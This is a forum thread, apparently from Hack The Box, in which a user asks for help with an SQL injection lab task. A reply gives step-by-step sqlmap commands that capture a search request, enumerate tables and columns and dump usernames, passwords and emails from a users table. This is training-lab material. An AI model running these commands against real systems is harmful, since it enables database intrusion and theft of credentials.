Hello, Please, I need help with this question. Use any of the techniques to exploit this SQL injection vulnerability on the target over port 8080. What is the password hash of the user whose email is Amy.Mcwilliams@proton.me?
I am stuck. Those who solve it can you please give me some direction?
dear friends to achive this first you need to used sqlmap
steps
1/ intercept the search put anything on the search and intercepted
2/ right click select copy URL save it as txt
3/ used sqlmap command sudo sqlmap -r hackthebox.txt --batch --risk=3 --level=5
4/ sqlmap -r hackthebox.txt --tables --batch --dbms=PostgreSQL --risk=3 --level=5
5/ % sqlmap -r hackthebox.txt --columns -t users --batch --dbms=PostgreSQL --risk=3 --level=5
6/ finally % sqlmap -r hackthebox.txt --dump -T users -C username,password,email --where=“email=‘Amy.Mcwilliams@proton.me’” --batch --dbms=PostgreSQL --risk=3 --level=5
and you got this hope that helps
Thanks greatly for your help.
1 Like
Oh yeah, no problem. Did you work for you?
Test for Vulnerabilities, Start with basic test inputs